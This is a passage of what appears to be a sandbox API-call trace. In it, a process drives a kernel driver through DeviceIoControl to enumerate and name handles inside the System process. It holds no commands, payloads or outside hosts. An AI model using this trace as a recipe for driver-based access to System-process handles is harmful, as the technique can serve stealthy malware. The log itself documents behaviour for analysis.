Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003198044, ReturnLength=0xfffff880052b3550) returned 0x0 [0201.032] ObfDereferenceObject (Object=0xfffffa8001ea4930) returned 0x2 [0201.032] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0201.032] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0201.032] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0201.032] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0201.032] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0201.032] PsAcquireProcessExitSynchronization () returned 0x0 [0201.032] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0201.032] ObReferenceObjectByHandle (in: Handle=0xffffffff80000728, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001ed2d20, HandleInformation=0x0) returned 0x0 [0201.032] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0201.032] PsReleaseProcessExitSynchronization () returned 0x2 [0201.032] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0201.032] ObQueryNameString (in: Object=0xfffffa8001ed2d20, ObjectNameInfo=0xfffffa8003156044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003156044, ReturnLength=0xfffff880052b3550) returned 0x0 [0201.032] ObfDereferenceObject (Object=0xfffffa8001ed2d20) returned 0x2 [0201.032] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0201.032] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0201.032] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0201.032] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0201.032] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0201.032] PsAcquireProcessExitSynchronization () returned 0x0 [0201.032] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0201.033] ObReferenceObjectByHandle (in: Handle=0xffffffff8000072c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001e813b0, HandleInformation=0x0) returned 0x0 [0201.033] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0201.033] PsReleaseProcessExitSynchronization () returned 0x2 [0201.033] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0201.033] ObQueryNameString (in: Object=0xfffffa8001e813b0, ObjectNameInfo=0xfffffa8003085044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003085044, ReturnLength=0xfffff880052b3550) returned 0x0 [0201.033] ObfDereferenceObject (Object=0xfffffa8001e813b0) returned 0x2 [0201.033] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0201.033] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0201.033] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0201.033] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0201.033] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0201.033] PsAcquireProcessExitSynchronization () returned 0x0 [0201.033] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0201.033] ObReferenceObjectByHandle (in: Handle=0xffffffff80000730, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001ed1200, HandleInformation=0x0) returned 0x0 [0201.033] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0201.033] PsReleaseProcessExitSynchronization () returned 0x2 [0201.033] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0201.033] ObQueryNameString (in: Object=0xfffffa8001ed1200, ObjectNameInfo=0xfffffa8003082044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003082044, ReturnLength=0xfffff880052b3550) returned 0x0 [0201.033] ObfDereferenceObject (Object=0xfffffa8001ed1200) returned 0x2 [0201.033] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0201.033] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0201.033] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0201.033] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0201.034] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0201.034] PsAcquireProcessExitSynchronization () returned 0x0 [0201.034] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0201.034] ObReferenceObjectByHandle (in: Handle=0xffffffff80000734, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001ecdd20, HandleInformation=0x0) returned 0x0 [0201.034] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0201.034] PsReleaseProcessExitSynchronization () returned 0x2 [0201.034] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0201.034] ObQueryNameString (in: Object=0xfffffa8001ecdd20, ObjectNameInfo=0xfffffa800306b044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306b044, ReturnLength=0xfffff880052b3550) returned 0x0 [0201.034] ObfDereferenceObject (Object=0xfffffa8001ecdd20) returned 0x2 [0201.034] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0201.034] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0201.034] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0201.034] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0201.034] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0201.034] PsAcquireProcessExitSynchronization () returned 0x0 [0201.034] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0201.034] ObReferenceObjectByHandle (in: Handle=0xffffffff80000738, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001ed1890, HandleInformation=0x0) returned 0x0 [0201.034] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0201.034] PsReleaseProcessExitSynchronization () returned 0x2 [0201.034] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0201.034] ObQueryNameString (in: Object=0xfffffa8001ed1890, ObjectNameInfo=0xfffffa8003080044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003080044, ReturnLength=0xfffff880052b3550) returned 0x0 [0201.034] ObfDereferenceObject (Object=0xfffffa8001ed1890) returned 0x2 [0201.034] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0201.034] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0201.034] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0201.034] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0201.035] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0201.035] PsAcquireProcessExitSynchronization () returned 0x0 [0201.035] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0201.035] ObReferenceObjectByHandle (in: Handle=0xffffffff8000073c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001ecd690, HandleInformation=0x0) returned 0x0 [0201.035] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0201.035] PsReleaseProcessExitSynchronization () returned 0x2 [0201.035] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0201.035] ObQueryNameString (in: Object=0xfffffa8001ecd690, ObjectNameInfo=0xfffffa8003148044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003148044, ReturnLength=0xfffff880052b3550) returned 0x0 [0201.035] ObfDereferenceObject (Object=0xfffffa8001ecd690) returned 0x2 [0201.035] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0201.035] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0201.035] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0201.035] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0201.035] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0201.035] PsAcquireProcessExitSynchronization () returned 0x0 [0201.035] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0201.035] ObReferenceObjectByHandle (in: Handle=0xffffffff80000740, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001ed0e50, HandleInformation=0x0) returned 0x0 [0201.035] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0201.035] PsReleaseProcessExitSynchronization () returned 0x2 [0201.035] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0201.035] ObQueryNameString (in: Object=0xfffffa8001ed0e50, ObjectNameInfo=0xfffffa8003071044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003071044, ReturnLength=0xfffff880052b3550) returned 0x0 [0201.035] ObfDereferenceObject (Object=0xfffffa8001ed0e50) returned 0x2 [0201.035] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0201.036] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0201.036] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0201.036] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0201.036] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0201.036] PsAcquireProcessExitSynchronization () returned 0x0 [0201.036] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0201.036] ObReferenceObjectByHandle (in: Handle=0xffffffff80000744, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001ecee50, HandleInformation=0x0) returned 0x0 [0201.036] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0201.036] PsReleaseProcessExitSynchronization () returned 0x2 [0201.036] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0201.036] ObQueryNameString (in: Object=0xfffffa8001ecee50, ObjectNameInfo=0xfffffa800307c044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800307c044, ReturnLength=0xfffff880052b3550) returned 0x0 [0201.036] ObfDereferenceObject (Object=0xfffffa8001ecee50) returned 0x2 [0201.036] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0201.036] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0201.036] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0201.036] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0201.036] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0201.036] PsAcquireProcessExitSynchronization () returned 0x0 [0201.036] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0201.036] ObReferenceObjectByHandle (in: Handle=0xffffffff80000748, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001ed07c0, HandleInformation=0x0) returned 0x0 [0201.036] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0201.036] PsReleaseProcessExitSynchronization () returned 0x2 [0201.036] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0201.036] ObQueryNameString (in: Object=0xfffffa8001ed07c0, ObjectNameInfo=0xfffffa8003081044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003081044, ReturnLength=0xfffff880052b3550) returned 0x0 [0201.036] ObfDereferenceObject (Object=0xfffffa8001ed07c0) returned 0x2 [0201.036] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0201.037] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0201.037] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0201.037] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0201.037] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0201.037] PsAcquireProcessExitSynchronization () returned 0x0 [0201.037] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0201.037] ObReferenceObjectByHandle (in: Handle=0xffffffff8000074c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001ece7c0, HandleInformation=0x0) returned 0x0 [0201.037] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0201.037] PsReleaseProcessExitSynchronization () returned 0x2 [0201.037] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0201.037] ObQueryNameString (in: Object=0xfffffa8001ece7c0, ObjectNameInfo=0xfffffa800310c044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800310c044, ReturnLength=0xfffff880052b3550) returned 0x0 [0201.037] ObfDereferenceObject (Object=0xfffffa8001ece7c0) returned 0x2 [0201.037] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0201.037] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0201.037] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0201.037] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0201.037] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0201.037] PsAcquireProcessExitSynchronization () returned 0x0 [0201.037] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0201.037] ObReferenceObjectByHandle (in: Handle=0xffffffff80000750, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001ed1f20, HandleInformation=0x0) returned 0x0 [0201.037] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0201.037] PsReleaseProcessExitSynchronization () returned 0x2 [0201.037] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0201.037] ObQueryNameString (in: Object=0xfffffa8001ed1f20, ObjectNameInfo=0xfffffa8003122044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003122044, ReturnLength=0xfffff880052b3550) returned 0x0 [0201.037] ObfDereferenceObject (Object=0xfffffa8001ed1f20) returned 0x2 [0201.037] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0201.038] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0201.038] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0201.038] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0201.038] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0201.038] PsAcquireProcessExitSynchronization () returned 0x0 [0201.038] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0201.038] ObReferenceObjectByHandle (in: Handle=0xffffffff80000754, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001ecf050, HandleInformation=0x0) returned 0x0 [0201.038] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0201.038] PsReleaseProcessExitSynchronization () returned 0x2 [0201.038] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0201.038] ObQueryNameString (in: Object=0xfffffa8001ecf050, ObjectNameInfo=0xfffffa800312e044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800312e044, ReturnLength=0xfffff880052b3550) returned 0x0 [0201.038] ObfDereferenceObject (Object=0xfffffa8001ecf050) returned 0x2 [0201.038] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0201.038] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0201.038] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0201.038] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0201.038] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0201.038] PsAcquireProcessExitSynchronization () returned 0x0 [0201.038] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0201.038] ObReferenceObjectByHandle (in: Handle=0xffffffff80000794, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80034b9dc0, HandleInformation=0x0) returned 0x0 [0201.038] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0201.038] PsReleaseProcessExitSynchronization () returned 0x2 [0201.038] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0201.038] ObQueryNameString (in: Object=0xfffffa80034b9dc0, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880052b3550) returned 0x0 [0201.039] ObfDereferenceObject (Object=0xfffffa80034b9dc0) returned 0x2 [0201.039] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0201.039] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0201.039] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0201.039] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0201.039] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0201.039] PsAcquireProcessExitSynchronization () returned 0x0 [0201.039] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0201.039] ObReferenceObjectByHandle (in: Handle=0xffffffff80000798, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001f952c0, HandleInformation=0x0) returned 0x0 [0201.039] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0201.039] PsReleaseProcessExitSynchronization () returned 0x2 [0201.039] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0201.039] ObQueryNameString (in: Object=0xfffffa8001f952c0, ObjectNameInfo=0xfffffa800313e044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800313e044, ReturnLength=0xfffff880052b3550) returned 0x0 [0201.039] ObfDereferenceObject (Object=0xfffffa8001f952c0) returned 0x2 [0201.039] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0201.039] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0201.039] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0201.039] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0201.039] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0201.039] PsAcquireProcessExitSynchronization () returned 0x0 [0201.039] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0201.039] ObReferenceObjectByHandle (in: Handle=0xffffffff8000079c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003a39120, HandleInformation=0x0) returned 0x0 [0201.039] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0201.039] PsReleaseProcessExitSynchronization () returned 0x2 [0201.040] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0201.040] ObQueryNameString (in: Object=0xfffffa8003a39120, ObjectNameInfo=0xfffffa800314b044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800314b044, ReturnLength=0xfffff880052b3550) returned 0x0 [0201.040] ObfDereferenceObject (Object=0xfffffa8003a39120) returned 0x2 [0201.040] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0201.040] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0201.040] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, 